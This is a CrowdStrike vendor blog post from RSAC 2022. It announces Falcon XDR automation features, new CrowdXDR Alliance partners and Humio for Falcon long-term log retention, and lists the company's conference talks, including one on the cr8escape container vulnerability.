RSAC 2022: CrowdStrike Innovations that Prioritize Data

It’s been several years since we’ve been at the RSA Conference in person and having face-to-face interaction is invaluable — the energy here is palpable. The theme for RSAC 2022 is “transform.” It's a fitting theme given how much has changed in the cybersecurity world in the last few years. The move to support remote workers, the massive adoption of cloud workloads, and the proliferation of devices and assets connected to corporate networks have merged to create a massive attack surface that adversaries seek to exploit. These broad trends have also generated vast amounts of data that create unique opportunities for organizations to gain deeper observability and understanding of how their environments operate.

 

 

 

At CrowdStrike, we embrace the concept of transformation and continue to build technology that transforms the way security is delivered and experienced by customers. We want to empower our customers to use data to make actionable decisions faster. In the current landscape, understanding data and quickly acting on it is the difference between being breached or not.

 

This drive for innovation and transformation is demonstrated in two big announcements that CrowdStrike is making today at RSAC. The first includes new automation capabilities and deeper data integrations in CROWDSTRIKE FALCON® XDR to supercharge threat detection, investigations, response and hunting. The second announcement is Humio for Falcon, a new capability that extends data retention of CrowdStrike Falcon®® telemetry for one year or longer, enhancing threat analytics, threat hunting abilities and compliance requirements.

 

Expanding Our Vision of CrowdXDR Alliance with New Partners

It’s important to note that third-party data ingestion is critical for driving outcomes in extended detection and response (XDR). The data ingestion process can be complex — varying by vendor platform and dependent on each customer’s environment configurations. This is why CrowdStrike continues to expand third-party support for the CrowdXDR Alliance, which is delivering a standardized schema for data sharing to enrich XDR detections.

 

This morning, CrowdStrike announced several exciting developments that further solidify our position as a leader in XDR. The first is the expansion of our CrowdXDR Alliance to include key strategic partners, including:
  • Menlo Security: web and email security
  • Ping Identity: identity and access management
  • Vectra: network detection and response
Together, the CrowdXDR Alliance will extend the capabilities of CROWDSTRIKE FALCON® XDR to accelerate triage and investigation for our customers, and automate responses across endpoint, cloud, identity management, network and web security.

 

By extending visibility and control into identities, network, cloud, email and applications, customers will have the flexibility and extension options needed based on their security technology stack. These new partnerships will also empower security teams to identify and hunt for threats at an increased speed and scale, all while providing powerful and relevant insights using data sources that extend the power of endpoint detection and response (EDR) beyond endpoints.

CROWDSTRIKE FALCON® XDR Automates Incident Response for Faster Detection and Remediation

Additionally, we have invested in our CROWDSTRIKE FALCON® XDR tech for organizations seeking a native approach by adding new capabilities that speed up detections, including:
  • Falcon Fusion workflows based on XDR detections: Our customers can now automate incident response workflows with Falcon Fusion, CrowdStrike’s security orchestration, automation and response (SOAR) framework, which is fully integrated with CROWDSTRIKE FALCON® XDR. Falcon Fusion now automates numerous workflows directly from a CROWDSTRIKE FALCON® XDR detection, including:
    • Ticket creation through ServiceNow, a CrowdXDR Alliance partner.

       

    • Notifications through email, Slack or webhook.

       

    • Incident details from status changes to team assignments and comments.

       

  • XDR detections event timeline: We’ve accelerated triage and investigation with a timeline view that displays key events of a detection in chronological order to easily understand how activity progressed.

     

  • Graph visualization of custom XDR detections: Customers can create custom XDR detections from queries they've written to hunt for threats in their environment. CROWDSTRIKE FALCON® XDR graph explorer visualizes how the events and entities in a custom XDR detection are related, enabling security analysts to rapidly orient and explore connections in cross-domain data.
Providing immediate customer value and helping to solve their biggest security problems is at the heart of everything we do at CrowdStrike. Our tech has always aligned with this vision down to its fundamental foundation. One of these problems, customers have told us, is a struggle to make sense of the sheer amount and complexity of log data and telemetry.

 

The CrowdXDR Alliance is critical for this very reason: so we can empower customers to effectively and elegantly enrich the data that we have with other third parties, creating a detailed storyline on how an attack develops and progresses from detection to remediation. We have continued to invest in enriching endpoint data by adding visibility and telemetry from all workloads, regardless of where they are: on premises, in the cloud or deployed in a container. As we know well by now, good XDR starts with good EDR, and CrowdStrike’s EDR is unparalleled in the market. Unlike other vendors that claim to “be XDR” without providing any framework for it nor any semblance of a robust EDR strategy, CrowdStrike’s strategy has been clear from the beginning: bring the right information into the Falcon platform at the right time to enrich our EDR telemetry. This allows us to make actionable decisions about real-world scenarios, which is incredibly impactful for security operations teams and CISOs who live and die by the data.

 

Data Storage and Management at Scale: Humio for Falcon

We also announced a new capability today, Humio for Falcon, which enables security teams to have

 

an incredibly cost-effective way to store and manage data.
Humio for Falcon will enable customers to have access to extended data retention for one year or longer with CrowdStrike Falcon®’s enriched security telemetry. Security teams have been asking for contextual data to provide timely and valuable insights across their IT environments. Now, Humio for Falcon will not only help organizations fulfill compliance requirements but also inform threat analytics and threat hunting abilities. With Humio for Falcon, customers now have a cost-effective and easy way to search for years' worth of their EDR data, which is revolutionary in its own right. We’ve heard time and again from customers using competing products that they're simply paying too much for this type of service and they need to be able to log more data, not less. This is ever-more timely in the wake of widespread issues, such as Log4Shell.

 

In fact, in the wake of Log4Shell, customers around the world told us that of all the technologies they had in their environment, the de facto go-to technology was the Falcon platform in conjunction with our Humio technology. With this winning combination, customers were able to do a quick sweep of their cyber environment to look for Log4Shell issues and obtain a view of a year’s worth of data within seconds. We know these cyber issues affect an organization’s bottom line, so every second counts, and that’s the power of Humio for Falcon. Humio for Falcon brings together the world’s most advanced security platform in CrowdStrike Falcon®, with our Humio offering, which expands our XDR capabilities by ingesting and correlating data from any log, application or feed to deliver actionable insights and real-time protection. In other words, customers receive data ingestion that’s faster, more flexible and less costly than anything on the market, while they get deep, contextual and faster analytics on massive amounts of log data. With longer data retention, security teams can see potential threats faster than ever within their environments and conduct lightning-fast searches on log data. That speed enables threat hunting and troubleshooting at an unprecedented scale. Customers can feed Falcon platform data directly into Humio with the Falcon Data Replicator (FDR). This data is instantly searchable and can be cross-referenced with other incumbent data sources in Humio. By analyzing multiple log sources as part of their security detections, customers can better define and narrow the scope of detections to match exact adversary techniques and behaviors, resulting in fewer false positives. Other benefits include:
  • Reduced cost with longer data retention: With Humio’s scalable storage and advanced compression techniques, customers can keep Falcon platform data in Humio for one year or longer. This wealth of historical data gives customers the confidence they need for complete and accurate investigations, which allows faster, focused and more cost-effective detection and remediation.
  • Fast and custom search: Humio’s feature-rich query language and index-free search times allow customers to ask any questions of their Falcon platform data and get immediate answers with new UI dashboards. Customers can create specific research that meets an exact business scenario and generate new insights from their Falcon platform data.

     

CrowdStrike’s fundamental technology advantage is that we are relentlessly customer-obsessed. We want to solve the hard problems that are of the most importance to our customers and our tech stack delivers on the promise of stopping breaches. We have created a once-in-a-generation cloud platform for cybersecurity that solves a growing list of customer needs, all from a single agent, providing durable growth for many years to come.

 

Join CrowdStrike at RSAC

 

If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training. CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.

 

 

Here are a few things to look forward to this week: KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures
  • Date: Thursday, June 9, 9:40-10:30 a.m. PT

     

  • I will be joined on stage by CrowdStrike CEO George Kurtz to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster.

     

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis
  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis.

     

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations
  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents.

     

Additional Resources

Breaches Stop Here